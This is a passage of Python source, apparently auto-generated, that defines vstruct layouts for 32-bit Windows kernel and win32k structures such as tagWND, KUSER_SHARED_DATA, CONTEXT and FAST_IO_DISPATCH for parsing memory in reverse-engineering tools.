class TLSPRITESTATE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.bInsideDriverCall = v_uint8()
self._pad0004 = v_bytes(size=3)
self.flOriginalSurfFlags = v_uint32()
self.iOriginalType = v_uint32()
self.flSpriteSurfFlags = v_uint32()
self.iSpriteType = v_uint32()
self.flags = v_uint32()
self.iType = v_uint32()
self.pState = v_ptr32()
self.pfnStrokeAndFillPath = v_ptr32()
self.pfnStrokePath = v_ptr32()
self.pfnFillPath = v_ptr32()
self.pfnPaint = v_ptr32()
self.pfnBitBlt = v_ptr32()
self.pfnCopyBits = v_ptr32()
self.pfnStretchBlt = v_ptr32()
self.pfnTextOut = v_ptr32()
self.pfnLineTo = v_ptr32()
self.pfnTransparentBlt = v_ptr32()
self.pfnAlphaBlend = v_ptr32()
self.pfnPlgBlt = v_ptr32()
self.pfnGradientFill = v_ptr32()
self.pfnSaveScreenBits = v_ptr32()
self.pfnStretchBltROP = v_ptr32()
self.pfnDrawStream = v_ptr32()
class _unnamed_15886(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pRgb256x3x16 = v_ptr32()
class tagQMSG(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pqmsgNext = v_ptr32()
self.pqmsgPrev = v_ptr32()
self.msg = tagMSG()
self.ExtraInfo = v_uint32()
self.ptMouseReal = tagPOINT()
self.dwQEvent = v_uint32()
self.Wow64Message = v_uint32()
self.pti = v_ptr32()
self.MsgPPInfo = tagMSGPPINFO()
class PAGED_LOOKASIDE_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.L = GENERAL_LOOKASIDE()
self.Lock__ObsoleteButDoNotDelete = FAST_MUTEX()
class RTL_BITMAP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SizeOfBitMap = v_uint32()
self.Buffer = v_ptr32()
class LARGE_INTEGER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.HighPart = v_uint32()
class HICON(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class NPAGED_LOOKASIDE_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.L = GENERAL_LOOKASIDE()
self.Lock__ObsoleteButDoNotDelete = v_uint32()
self._pad0050 = v_bytes(size=4)
class _unnamed_12830(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.InPath = v_uint8()
self.Reserved = vstruct.VArray([ v_uint8() for i in xrange(3) ])
self.Type = v_uint32()
class tagWin32PoolHead(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.size = v_uint32()
self.pPrev = v_ptr32()
self.pNext = v_ptr32()
self.pTrace = v_ptr32()
class _unnamed_12686(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.FsInformationClass = v_uint32()
class VPB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.Size = v_uint16()
self.Flags = v_uint16()
self.VolumeLabelLength = v_uint16()
self.DeviceObject = v_ptr32()
self.RealDevice = v_ptr32()
self.SerialNumber = v_uint32()
self.ReferenceCount = v_uint32()
self.VolumeLabel = vstruct.VArray([ v_uint16() for i in xrange(32) ])
class _unnamed_12689(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.OutputBufferLength = v_uint32()
self.InputBufferLength = v_uint32()
self.FsControlCode = v_uint32()
self.Type3InputBuffer = v_ptr32()
class HEAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.h = v_ptr32()
self.cLockObj = v_uint32()
class OBJECT_NAME_INFORMATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Name = UNICODE_STRING()
class IO_RESOURCE_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Version = v_uint16()
self.Revision = v_uint16()
self.Count = v_uint32()
self.Descriptors = vstruct.VArray([ IO_RESOURCE_DESCRIPTOR() for i in xrange(1) ])
class KUSER_SHARED_DATA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.TickCountLowDeprecated = v_uint32()
self.TickCountMultiplier = v_uint32()
self.InterruptTime = KSYSTEM_TIME()
self.SystemTime = KSYSTEM_TIME()
self.TimeZoneBias = KSYSTEM_TIME()
self.ImageNumberLow = v_uint16()
self.ImageNumberHigh = v_uint16()
self.NtSystemRoot = vstruct.VArray([ v_uint16() for i in xrange(260) ])
self.MaxStackTraceDepth = v_uint32()
self.CryptoExponent = v_uint32()
self.TimeZoneId = v_uint32()
self.LargePageMinimum = v_uint32()
self.Reserved2 = vstruct.VArray([ v_uint32() for i in xrange(7) ])
self.NtProductType = v_uint32()
self.ProductTypeIsValid = v_uint8()
self._pad026c = v_bytes(size=3)
self.NtMajorVersion = v_uint32()
self.NtMinorVersion = v_uint32()
self.ProcessorFeatures = vstruct.VArray([ v_uint8() for i in xrange(64) ])
self.Reserved1 = v_uint32()
self.Reserved3 = v_uint32()
self.TimeSlip = v_uint32()
self.AlternativeArchitecture = v_uint32()
self.AltArchitecturePad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
self.SystemExpirationDate = LARGE_INTEGER()
self.SuiteMask = v_uint32()
self.KdDebuggerEnabled = v_uint8()
self.NXSupportPolicy = v_uint8()
self._pad02d8 = v_bytes(size=2)
self.ActiveConsoleId = v_uint32()
self.DismountCount = v_uint32()
self.ComPlusPackage = v_uint32()
self.LastSystemRITEventTickCount = v_uint32()
self.NumberOfPhysicalPages = v_uint32()
self.SafeBootMode = v_uint8()
self.TscQpcData = v_uint8()
self.TscQpcPad = vstruct.VArray([ v_uint8() for i in xrange(2) ])
self.SharedDataFlags = v_uint32()
self.DataFlagsPad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
self.TestRetInstruction = v_uint64()
self.SystemCall = v_uint32()
self.SystemCallReturn = v_uint32()
self.SystemCallPad = vstruct.VArray([ v_uint64() for i in xrange(3) ])
self.TickCount = KSYSTEM_TIME()
self.TickCountPad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
self.Cookie = v_uint32()
self.CookiePad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
self.ConsoleSessionForegroundProcessId = v_uint64()
self.Wow64SharedInformation = vstruct.VArray([ v_uint32() for i in xrange(16) ])
self.UserModeGlobalLogger = vstruct.VArray([ v_uint16() for i in xrange(16) ])
self.ImageFileExecutionOptions = v_uint32()
self.LangGenerationCount = v_uint32()
self.Reserved5 = v_uint64()
self.InterruptTimeBias = v_uint64()
self.TscQpcBias = v_uint64()
self.ActiveProcessorCount = v_uint32()
self.ActiveGroupCount = v_uint16()
self.Reserved4 = v_uint16()
self.AitSamplingValue = v_uint32()
self.AppCompatFlag = v_uint32()
self.SystemDllNativeRelocation = v_uint64()
self.SystemDllWowRelocation = v_uint32()
self.XStatePad = vstruct.VArray([ v_uint32() for i in xrange(1) ])
self.XState = XSTATE_CONFIGURATION()
class SYSTEM_POWER_STATE_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Reserved1 = v_uint32()
class _unnamed_12707(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SecurityInformation = v_uint32()
self.SecurityDescriptor = v_ptr32()
class _unnamed_12704(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SecurityInformation = v_uint32()
self.Length = v_uint32()
class IO_STATUS_BLOCK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Status = v_uint32()
self.Information = v_uint32()
class PRIVILEGE_SET(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PrivilegeCount = v_uint32()
self.Control = v_uint32()
self.Privilege = vstruct.VArray([ LUID_AND_ATTRIBUTES() for i in xrange(1) ])
class CM_RESOURCE_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Count = v_uint32()
self.List = vstruct.VArray([ CM_FULL_RESOURCE_DESCRIPTOR() for i in xrange(1) ])
class _unnamed_12666(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.FileInformationClass = v_uint32()
self.FileObject = v_ptr32()
self.ReplaceIfExists = v_uint8()
self.AdvanceOnly = v_uint8()
self._pad0010 = v_bytes(size=2)
class EPROCESS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class _unnamed_12660(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.CompletionFilter = v_uint32()
class _unnamed_12663(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.FileInformationClass = v_uint32()
class tagPROFILEVALUEINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwValue = v_uint32()
self.uSection = v_uint32()
self.pwszKeyName = v_ptr32()
class TP_TASK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Callbacks = v_ptr32()
self.NumaNode = v_uint32()
self.IdealProcessor = v_uint8()
self._pad000c = v_bytes(size=3)
self.PostGuard = TP_NBQ_GUARD()
self.NBQNode = v_ptr32()
class TEB_ACTIVE_FRAME_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flags = v_uint32()
self.FrameName = v_ptr32()
class PFNCLIENTWORKER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pfnButtonWndProc = v_ptr32()
self.pfnComboBoxWndProc = v_ptr32()
self.pfnComboListBoxProc = v_ptr32()
self.pfnDialogWndProc = v_ptr32()
self.pfnEditWndProc = v_ptr32()
self.pfnListBoxWndProc = v_ptr32()
self.pfnMDIClientWndProc = v_ptr32()
self.pfnStaticWndProc = v_ptr32()
self.pfnImeWndProc = v_ptr32()
self.pfnGhostWndProc = v_ptr32()
self.pfnCtfHookProc = v_ptr32()
class DMM_COMMITVIDPNREQUESTSET_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NumCommitVidPnRequests = v_uint8()
self._pad0004 = v_bytes(size=3)
self.CommitVidPnRequestOffset = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class D3DKMDT_MONITOR_SOURCE_MODE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Id = v_uint32()
self.VideoSignalInfo = D3DKMDT_VIDEO_SIGNAL_INFO()
self.ColorBasis = v_uint32()
self.ColorCoeffDynamicRanges = D3DKMDT_COLOR_COEFF_DYNAMIC_RANGES()
self.Origin = v_uint32()
self.Preference = v_uint32()
class tagDISPLAYINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.hDev = v_ptr32()
self.pmdev = v_ptr32()
self.hDevInfo = v_ptr32()
self.hdcScreen = v_ptr32()
self.hdcBits = v_ptr32()
self.hdcGray = v_ptr32()
self.hbmGray = v_ptr32()
self.cxGray = v_uint32()
self.cyGray = v_uint32()
self.pdceFirst = v_ptr32()
self.pspbFirst = v_ptr32()
self.cMonitors = v_uint32()
self.pMonitorPrimary = v_ptr32()
self.pMonitorFirst = v_ptr32()
self.rcScreenReal = tagRECT()
self.hrgnScreenReal = v_ptr32()
self.dmLogPixels = v_uint16()
self.BitCountMax = v_uint16()
self.fDesktopIsRect = v_uint32()
self.DockThresholdMax = v_uint32()
self.SpatialListHead = KLIST_ENTRY()
self.cFullScreen = v_uint16()
self.Spare0 = v_uint16()
class CM_PARTIAL_RESOURCE_DESCRIPTOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint8()
self.ShareDisposition = v_uint8()
self.Flags = v_uint16()
self.u = _unnamed_15793()
class _unnamed_13381(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Graphics = D3DKMDT_GRAPHICS_RENDERING_FORMAT()
class HRGN(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class OBJECT_ATTRIBUTES(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.RootDirectory = v_ptr32()
self.ObjectName = v_ptr32()
self.Attributes = v_uint32()
self.SecurityDescriptor = v_ptr32()
self.SecurityQualityOfService = v_ptr32()
class _unnamed_16067(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Level = v_uint16()
self.Group = v_uint16()
self.Vector = v_uint32()
self.Affinity = v_uint32()
class CM_FULL_RESOURCE_DESCRIPTOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.InterfaceType = v_uint32()
self.BusNumber = v_uint32()
self.PartialResourceList = CM_PARTIAL_RESOURCE_LIST()
class _unnamed_16064(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Start = LARGE_INTEGER()
self.Length = v_uint32()
class FAST_IO_DISPATCH(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SizeOfFastIoDispatch = v_uint32()
self.FastIoCheckIfPossible = v_ptr32()
self.FastIoRead = v_ptr32()
self.FastIoWrite = v_ptr32()
self.FastIoQueryBasicInfo = v_ptr32()
self.FastIoQueryStandardInfo = v_ptr32()
self.FastIoLock = v_ptr32()
self.FastIoUnlockSingle = v_ptr32()
self.FastIoUnlockAll = v_ptr32()
self.FastIoUnlockAllByKey = v_ptr32()
self.FastIoDeviceControl = v_ptr32()
self.AcquireFileForNtCreateSection = v_ptr32()
self.ReleaseFileForNtCreateSection = v_ptr32()
self.FastIoDetachDevice = v_ptr32()
self.FastIoQueryNetworkOpenInfo = v_ptr32()
self.AcquireForModWrite = v_ptr32()
self.MdlRead = v_ptr32()
self.MdlReadComplete = v_ptr32()
self.PrepareMdlWrite = v_ptr32()
self.MdlWriteComplete = v_ptr32()
self.FastIoReadCompressed = v_ptr32()
self.FastIoWriteCompressed = v_ptr32()
self.MdlReadCompleteCompressed = v_ptr32()
self.MdlWriteCompleteCompressed = v_ptr32()
self.FastIoQueryOpen = v_ptr32()
self.ReleaseForModWrite = v_ptr32()
self.AcquireForCcFlush = v_ptr32()
self.ReleaseForCcFlush = v_ptr32()
class VSC_LPWSTR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.vsc = v_uint8()
self._pad0004 = v_bytes(size=3)
self.pwsz = v_ptr32()
class _unnamed_12389(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MasterIrp = v_ptr32()
class KFLOATING_SAVE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ControlWord = v_uint32()
self.StatusWord = v_uint32()
self.ErrorOffset = v_uint32()
self.ErrorSelector = v_uint32()
self.DataOffset = v_uint32()
self.DataSelector = v_uint32()
self.Cr0NpxState = v_uint32()
self.Spare1 = v_uint32()
class RTL_DYNAMIC_HASH_TABLE_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ChainHead = v_ptr32()
self.PrevLinkage = v_ptr32()
self.Signature = v_uint32()
class tagSBDATA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.posMin = v_uint32()
self.posMax = v_uint32()
self.page = v_uint32()
self.pos = v_uint32()
class D3DDDI_GAMMA_RAMP_RGB256x3x16(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Red = vstruct.VArray([ v_uint16() for i in xrange(256) ])
self.Green = vstruct.VArray([ v_uint16() for i in xrange(256) ])
self.Blue = vstruct.VArray([ v_uint16() for i in xrange(256) ])
class tagUAHMENUPOPUPMETRICS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.rgcx = vstruct.VArray([ v_uint32() for i in xrange(4) ])
self.fUpdateMaxWidths = v_uint32()
class THROBJHEAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.h = v_ptr32()
self.cLockObj = v_uint32()
self.pti = v_ptr32()
class DMM_VIDPNTARGETMODESET_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NumModes = v_uint8()
self._pad0004 = v_bytes(size=3)
self.ModeSerialization = vstruct.VArray([ D3DKMDT_VIDPN_TARGET_MODE() for i in xrange(1) ])
class KSPECIAL_REGISTERS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Cr0 = v_uint32()
self.Cr2 = v_uint32()
self.Cr3 = v_uint32()
self.Cr4 = v_uint32()
self.KernelDr0 = v_uint32()
self.KernelDr1 = v_uint32()
self.KernelDr2 = v_uint32()
self.KernelDr3 = v_uint32()
self.KernelDr6 = v_uint32()
self.KernelDr7 = v_uint32()
self.Gdtr = DESCRIPTOR()
self.Idtr = DESCRIPTOR()
self.Tr = v_uint16()
self.Ldtr = v_uint16()
self.Reserved = vstruct.VArray([ v_uint32() for i in xrange(6) ])
class TP_NBQ_GUARD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.GuardLinks = LIST_ENTRY()
self.Guards = vstruct.VArray([ v_ptr32() for i in xrange(2) ])
class RTL_CRITICAL_SECTION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DebugInfo = v_ptr32()
self.LockCount = v_uint32()
self.RecursionCount = v_uint32()
self.OwningThread = v_ptr32()
self.LockSemaphore = v_ptr32()
self.SpinCount = v_uint32()
class KSYSTEM_TIME(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.High1Time = v_uint32()
self.High2Time = v_uint32()
class tagTOUCHINPUT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.x = v_uint32()
self.y = v_uint32()
self.hSource = v_ptr32()
self.dwID = v_uint32()
self.dwFlags = v_uint32()
self.dwMask = v_uint32()
self.dwTime = v_uint32()
self.dwExtraInfo = v_uint32()
self.cxContact = v_uint32()
self.cyContact = v_uint32()
class WNDMSG(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.maxMsgs = v_uint32()
self.abMsgs = v_ptr32()
class D3DDDI_RATIONAL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Numerator = v_uint32()
self.Denominator = v_uint32()
class LUID_AND_ATTRIBUTES(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Luid = LUID()
self.Attributes = v_uint32()
class tagSBTRACK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.fHitOld = v_uint32()
self.spwndTrack = v_ptr32()
self.spwndSB = v_ptr32()
self.spwndSBNotify = v_ptr32()
self.rcTrack = tagRECT()
self.xxxpfnSB = v_ptr32()
self.cmdSB = v_uint32()
self.hTimerSB = v_uint32()
self.dpxThumb = v_uint32()
self.pxOld = v_uint32()
self.posOld = v_uint32()
self.posNew = v_uint32()
self.nBar = v_uint32()
self.pSBCalc = v_ptr32()
class KPROCESSOR_STATE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ContextFrame = CONTEXT()
self.SpecialRegisters = KSPECIAL_REGISTERS()
class KTHREAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class HFONT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class tagDPISERVERINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.gclBorder = v_uint32()
self.hCaptionFont = v_ptr32()
self.hMsgFont = v_ptr32()
self.cxMsgFontChar = v_uint32()
self.cyMsgFontChar = v_uint32()
self.wMaxBtnSize = v_uint32()
class _unnamed_12876(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SystemContext = v_uint32()
self.Type = v_uint32()
self.State = POWER_STATE()
self.ShutdownType = v_uint32()
class HDC(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ContextFlags = v_uint32()
self.Dr0 = v_uint32()
self.Dr1 = v_uint32()
self.Dr2 = v_uint32()
self.Dr3 = v_uint32()
self.Dr6 = v_uint32()
self.Dr7 = v_uint32()
self.FloatSave = FLOATING_SAVE_AREA()
self.SegGs = v_uint32()
self.SegFs = v_uint32()
self.SegEs = v_uint32()
self.SegDs = v_uint32()
self.Edi = v_uint32()
self.Esi = v_uint32()
self.Ebx = v_uint32()
self.Edx = v_uint32()
self.Ecx = v_uint32()
self.Eax = v_uint32()
self.Ebp = v_uint32()
self.Eip = v_uint32()
self.SegCs = v_uint32()
self.EFlags = v_uint32()
self.Esp = v_uint32()
self.SegSs = v_uint32()
self.ExtendedRegisters = vstruct.VArray([ v_uint8() for i in xrange(512) ])
class AUX_ACCESS_DATA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PrivilegesUsed = v_ptr32()
self.GenericMapping = GENERIC_MAPPING()
self.AccessesToAudit = v_uint32()
self.MaximumAuditMask = v_uint32()
self.TransactionId = GUID()
self.NewSecurityDescriptor = v_ptr32()
self.ExistingSecurityDescriptor = v_ptr32()
self.ParentSecurityDescriptor = v_ptr32()
self.DeRefSecurityDescriptor = v_ptr32()
self.SDLock = v_ptr32()
self.AccessReasons = ACCESS_REASONS()
class LIGATURE1(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.VirtualKey = v_uint8()
self._pad0002 = v_bytes(size=1)
self.ModificationNumber = v_uint16()
self.wch = vstruct.VArray([ v_uint16() for i in xrange(1) ])
class _unnamed_12586(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SecurityContext = v_ptr32()
self.Options = v_uint32()
self.Reserved = v_uint16()
self.ShareAccess = v_uint16()
self.Parameters = v_ptr32()
class D3DKMDT_VIDPN_PRESENT_PATH_SCALING_SUPPORT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Identity = v_uint32()
class EVENT_DATA_DESCRIPTOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Ptr = v_uint64()
self.Size = v_uint32()
self.Reserved = v_uint32()
class IO_DRIVER_CREATE_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Size = v_uint16()
self._pad0004 = v_bytes(size=2)
self.ExtraCreateParameter = v_ptr32()
self.DeviceObjectHint = v_ptr32()
self.TxnParameters = v_ptr32()
class D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.CopyProtectionType = v_uint32()
self.APSTriggerBits = v_uint32()
self.OEMCopyProtection = vstruct.VArray([ v_uint8() for i in xrange(256) ])
self.CopyProtectionSupport = D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_SUPPORT()
class HMONITOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class EJOB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class D3DKMDT_GAMMA_RAMP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint32()
self.DataSize = v_uint32()
self.Data = _unnamed_15886()
class VK_TO_BIT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Vk = v_uint8()
self.ModBits = v_uint8()
class MODIFIERS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pVkToBit = v_ptr32()
self.wMaxModBits = v_uint16()
self.ModNumber = vstruct.VArray([ v_uint8() for i in xrange(0) ])
self._pad0008 = v_bytes(size=2)
class KAPC(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint8()
self.SpareByte0 = v_uint8()
self.Size = v_uint8()
self.SpareByte1 = v_uint8()
self.SpareLong0 = v_uint32()
self.Thread = v_ptr32()
self.ApcListEntry = LIST_ENTRY()
self.KernelRoutine = v_ptr32()
self.RundownRoutine = v_ptr32()
self.NormalRoutine = v_ptr32()
self.NormalContext = v_ptr32()
self.SystemArgument1 = v_ptr32()
self.SystemArgument2 = v_ptr32()
self.ApcStateIndex = v_uint8()
self.ApcMode = v_uint8()
self.Inserted = v_uint8()
self._pad0030 = v_bytes(size=1)
class DMM_MONITOR_SOURCE_MODE_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Info = D3DKMDT_MONITOR_SOURCE_MODE()
self.TimingType = v_uint32()
class tagIMEINFOEX(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.hkl = v_ptr32()
self.ImeInfo = tagIMEINFO()
self.wszUIClass = vstruct.VArray([ v_uint16() for i in xrange(16) ])
self.fdwInitConvMode = v_uint32()
self.fInitOpen = v_uint32()
self.fLoadFlag = v_uint32()
self.dwProdVersion = v_uint32()
self.dwImeWinVersion = v_uint32()
self.wszImeDescription = vstruct.VArray([ v_uint16() for i in xrange(50) ])
self.wszImeFile = vstruct.VArray([ v_uint16() for i in xrange(80) ])
self.fSysWow64Only = v_uint32()
class tagWND(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = THRDESKHEAD()
self.state = v_uint32()
self.state2 = v_uint32()
self.ExStyle = v_uint32()
self.style = v_uint32()
self.hModule = v_ptr32()
self.hMod16 = v_uint16()
self.fnid = v_uint16()
self.spwndNext = v_ptr32()
self.spwndPrev = v_ptr32()
self.spwndParent = v_ptr32()
self.spwndChild = v_ptr32()
self.spwndOwner = v_ptr32()
self.rcWindow = tagRECT()
self.rcClient = tagRECT()
self.lpfnWndProc = v_ptr32()
self.pcls = v_ptr32()
self.hrgnUpdate = v_ptr32()
self.ppropList = v_ptr32()
self.pSBInfo = v_ptr32()
self.spmenuSys = v_ptr32()
self.spmenu = v_ptr32()
self.hrgnClip = v_ptr32()
self.hrgnNewFrame = v_ptr32()
self.strName = LARGE_UNICODE_STRING()
self.cbwndExtra = v_uint32()
self.spwndLastActive = v_ptr32()
self.hImc = v_ptr32()
self.dwUserData = v_uint32()
self.pActCtx = v_ptr32()
self.pTransform = v_ptr32()
self.spwndClipboardListenerNext = v_ptr32()
self.ExStyle2 = v_uint32()
class XSTATE_FEATURE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Offset = v_uint32()
self.Size = v_uint32()
class _unnamed_12896(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Argument1 = v_ptr32()
self.Argument2 = v_ptr32()
self.Argument3 = v_ptr32()
self.Argument4 = v_ptr32()
class D3DDDI_GAMMA_RAMP_DXGI_1(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Scale = D3DDDI_DXGI_RGB()
self.Offset = D3DDDI_DXGI_RGB()
self.GammaCurve = vstruct.VArray([ D3DDDI_DXGI_RGB() for i in xrange(1025) ])
class WHEA_TIMESTAMP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Seconds = v_uint64()
class ACTIVATION_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class _unnamed_12891(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ProviderId = v_uint32()
self.DataPath = v_ptr32()
self.BufferSize = v_uint32()
self.Buffer = v_ptr32()
class tagUAHMENUITEMMETRICS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.rgsizeBar = vstruct.VArray([ tagSIZE() for i in xrange(2) ])
self._pad0020 = v_bytes(size=16)
class KLIST_ENTRY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flink = v_ptr32()
self.Blink = v_ptr32()
class RTL_CRITICAL_SECTION_DEBUG(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.CreatorBackTraceIndex = v_uint16()
self.CriticalSection = v_ptr32()
self.ProcessLocksList = LIST_ENTRY()
self.EntryCount = v_uint32()
self.ContentionCount = v_uint32()
self.Flags = v_uint32()
self.CreatorBackTraceIndexHigh = v_uint16()
self.SpareUSHORT = v_uint16()
class DISPATCHER_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint8()
self.TimerControlFlags = v_uint8()
self.ThreadControlFlags = v_uint8()
self.TimerMiscFlags = v_uint8()
self.SignalState = v_uint32()
self.WaitListHead = LIST_ENTRY()
class HBITMAP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class tagW32JOB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pNext = v_ptr32()
self.Job = v_ptr32()
self.pAtomTable = v_ptr32()
self.restrictions = v_uint32()
self.uProcessCount = v_uint32()
self.uMaxProcesses = v_uint32()
self.ppiTable = v_ptr32()
self.ughCrt = v_uint32()
self.ughMax = v_uint32()
self.pgh = v_ptr32()
class ASSEMBLY_STORAGE_MAP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class tagMBSTRING(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.szName = vstruct.VArray([ v_uint16() for i in xrange(15) ])
self._pad0020 = v_bytes(size=2)
self.uID = v_uint32()
self.uStr = v_uint32()
class POWER_SEQUENCE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SequenceD1 = v_uint32()
self.SequenceD2 = v_uint32()
self.SequenceD3 = v_uint32()
